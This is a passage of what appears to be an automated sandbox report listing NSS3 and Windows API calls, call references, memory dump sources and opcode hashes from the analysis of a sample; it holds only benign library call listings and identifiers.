                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60f5b62d1d4f5c7b66f2f3019fae9a740bca5fb6b8f4ffc1c3a1e6366fbc1de6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5631F479A00515ABEB01EF28DC84C6ABB78FF56259B458178ED0887B11EB31ED64C7E0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1ECB
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,00000001,?,S&Kl,6C496295,?,00000000,?,00000001,S&Kl,?), ref: 6C4B1EF1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B1F01
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B1F39
                                                                                                                                                                                                                            • Part of subcall function 6C4BFE20: TlsGetValue.KERNEL32(6C495ADC,?,00000000,00000001,?,?,00000000,?,6C48BA55,?,?), ref: 6C4BFE4B
                                                                                                                                                                                                                            • Part of subcall function 6C4BFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4BFE5F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B1F67
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                                          • String ID: S&Kl
                                                                                                                                                                                                                          • API String ID: 704537481-2478177983
                                                                                                                                                                                                                          • Opcode ID: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                          • Instruction ID: 7fbdf13bd2eff6ae8f22998a0cb4cfd9092c546150f6028bdcc372b9a53b902f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77a0d1b373536fc18443302e3e88730a4d0d41699ecf0fb6af502da708a4b666
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75210175A04204ABEB00EF29DC44F9A3769AF85369F194128FD08ABB01E730E954C6F0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                            • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4291907967-0
                                                                                                                                                                                                                          • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                          • Instruction ID: a9b4ad21d98da494e41a0d4d2ea41cddc45b89b5bfbeb302f5d4d6e56ea57f08
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F11A8A5F0120457E700FAA66C61FABB6EC9F5455EF05413DEC09D7B81FB60E90886F2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C488C1B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C488C34
                                                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C488C65
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C488C9C
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C488CB6
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
• String ID: KRAM
• API String ID: 4127063985-3815160215
APIs
• PK11_GetInternalKeySlot.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EA2
  • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
  • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
  • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
  • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
  • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
  • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
  • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
  • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
• PK11_IsLoggedIn.NSS3(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EC3
• TlsGetValue.KERNEL32(?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C), ref: 6C498EDC
• EnterCriticalSection.KERNEL32(?,?,?,?,6C4B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C498EF1
• PR_Unlock.NSS3 ref: 6C498F20
Strings
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
• String ID: b.Kl
• API String ID: 1978757487-3576770755
APIs
  • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
• PR_EnterMonitor.NSS3(?), ref: 6C503E45
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
  • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
  • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
• PR_EnterMonitor.NSS3(?), ref: 6C503E5C
• PR_EnterMonitor.NSS3(?), ref: 6C503E73
• PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C503EA6
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• PR_ExitMonitor.NSS3(?), ref: 6C503EC0
• PR_ExitMonitor.NSS3(?), ref: 6C503ED7
• PR_ExitMonitor.NSS3(?), ref: 6C503EEE
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
• String ID:
• API String ID: 2517541793-0
APIs
• PR_EnterMonitor.NSS3 ref: 6C582CA0
• PR_ExitMonitor.NSS3 ref: 6C582CBE
• calloc.MOZGLUE(00000001,00000014), ref: 6C582CD1
• strdup.MOZGLUE(?), ref: 6C582CE1
• PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C582D27
Strings
• Loaded library %s (static lib), xrefs: 6C582D22
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Monitor$EnterExitPrintcallocstrdup
• String ID: Loaded library %s (static lib)
• API String ID: 3511436785-2186981405
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C47BDCA
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDDB
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BDEC
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
• SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C47BE03
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE22
• PR_SetError.NSS3(FFFFE013,00000000), ref: 6C47BE30
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47BE3B
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
• String ID:
• API String ID: 1821307800-0
• Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
• Instruction ID: 5f964d81c9b8c11257a606a83ec57296a1e7582d1490ac854d5d33d2b95f33aa
• Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
• Instruction Fuzzy Hash: 01014EA5B4120177F620B2667C01FDB2A484F5039DF140034FE0496F82FB55F51982F6
APIs
• calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
• PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
• PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• TlsGetValue.KERNEL32(00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1044
• free.MOZGLUE(00000000,?,00000800,6C46EF74,00000000), ref: 6C4D1064
Strings
Similarity
• API ID: calloc$ArenaInitLockPoolValuefree
• String ID: security
• API String ID: 3379159031-3315324353
• Opcode ID: 02acba3b3836e3072f187da29241c84086c64a4e368e9009c5ff175770932a2a
• Instruction ID: 74857893dbfc25011145f99ef425064ebdb4660f07c2eda5b632f5e796c99fae
• Opcode Fuzzy Hash: 02acba3b3836e3072f187da29241c84086c64a4e368e9009c5ff175770932a2a
• Instruction Fuzzy Hash: C1014870A4025097E722BF2D8C08F467A78FF43769F030119EC0896E51EB60F105DBD5
APIs
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C501C74
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
• DeleteCriticalSection.KERNEL32(?), ref: 6C501C92
• free.MOZGLUE(?), ref: 6C501C99
• DeleteCriticalSection.KERNEL32(?), ref: 6C501CCB
• free.MOZGLUE(?), ref: 6C501CD2
Similarity
• API ID: CriticalDeleteSectionfree$ErrorValue
• String ID:
• API String ID: 3805613680-0
• Opcode ID: e12b4c4d7c8c5026a1d9c572679307f77e50c7cd1d3878ec3e7b9582dbaa7269
• Instruction ID: f3716130216a1e28f4058b5ac69fe08e53a65014b458d16a0b55e2fa74166e9b
• Opcode Fuzzy Hash: e12b4c4d7c8c5026a1d9c572679307f77e50c7cd1d3878ec3e7b9582dbaa7269
• Instruction Fuzzy Hash: 4601C4B1F057129BEA10EFA49C0E74A77B4A71630CF420825E50AE6F40E765F944879F
APIs
• memcpy.VCRUNTIME140(?,?,00000000), ref: 6C513046
  • Part of subcall function 6C4FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
• PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C4E7FFB), ref: 6C51312A
• memcpy.VCRUNTIME140(00000000,?,?), ref: 6C513154
• PR_SetError.NSS3(FFFFE001,00000000), ref: 6C512E8B
  • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
  • Part of subcall function 6C4FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C4E9BFF,?,00000000,00000000), ref: 6C4FF134
• memcpy.VCRUNTIME140(8B3C75C0,?,6C4E7FFA), ref: 6C512EA4
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C51317B
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                                                          • Opcode ID: d1b755c599a2000ef2dcd903d391b4e963ee6d873b1f720c8ba0e42a46adff1d
                                                                                                                                                                                                                          • Instruction ID: 91b54a429861581a86dc08948bef0b1e1e0f7f341b10f581897410e47bb54534
• Opcode Fuzzy Hash: d1b755c599a2000ef2dcd903d391b4e963ee6d873b1f720c8ba0e42a46adff1d
• Instruction Fuzzy Hash: D1A1CD71A042189FEB24CF54CC85FEAB7B5EF49308F048199E94967B41E731AD85CF91
APIs
• PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C4DED6B
• PORT_Alloc_Util.NSS3(00000000), ref: 6C4DEDCE
  • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
  • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
• free.MOZGLUE(00000000,?,?,?,?,6C4DB04F), ref: 6C4DEE46
• PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DEECA
• PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C4DEEEA
• PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4DEEFB
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Alloc_Util$Arena$Valuefreemalloc
• String ID:
• API String ID: 3768380896-0
• Opcode ID: d0f05117d560ebc0d0808c02d4f1b4d350f85c3ea38f08e77777e9d2624dd252
• Instruction ID: 38a578178581b246e55e8bfe7458f91c19bc4e0a70a125b44e253f5859eaf33e
• Opcode Fuzzy Hash: d0f05117d560ebc0d0808c02d4f1b4d350f85c3ea38f08e77777e9d2624dd252
• Instruction Fuzzy Hash: 0B816C71A012069FEB10EF55C8A4F6AB7F5AF48309F15442CE8159B751DB31F805CBE1
APIs
  • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
• PR_Now.NSS3 ref: 6C4DCD35
  • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
  • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
  • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
  • Part of subcall function 6C4C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
• PR_GetCurrentThread.NSS3 ref: 6C4DCD54
  • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
  • Part of subcall function 6C4C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471CCC,00000000,00000000,?,?), ref: 6C4C729F
• SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DCD9B
• PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C4DCE0B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C4DCE2C
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PORT_ArenaMark_Util.NSS3(00000000), ref: 6C4DCE40
  • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
  • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
  • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
  • Part of subcall function 6C4DCEE0: PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
  • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
  • Part of subcall function 6C4DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
  • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
  • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
  • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
  • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
Similarity
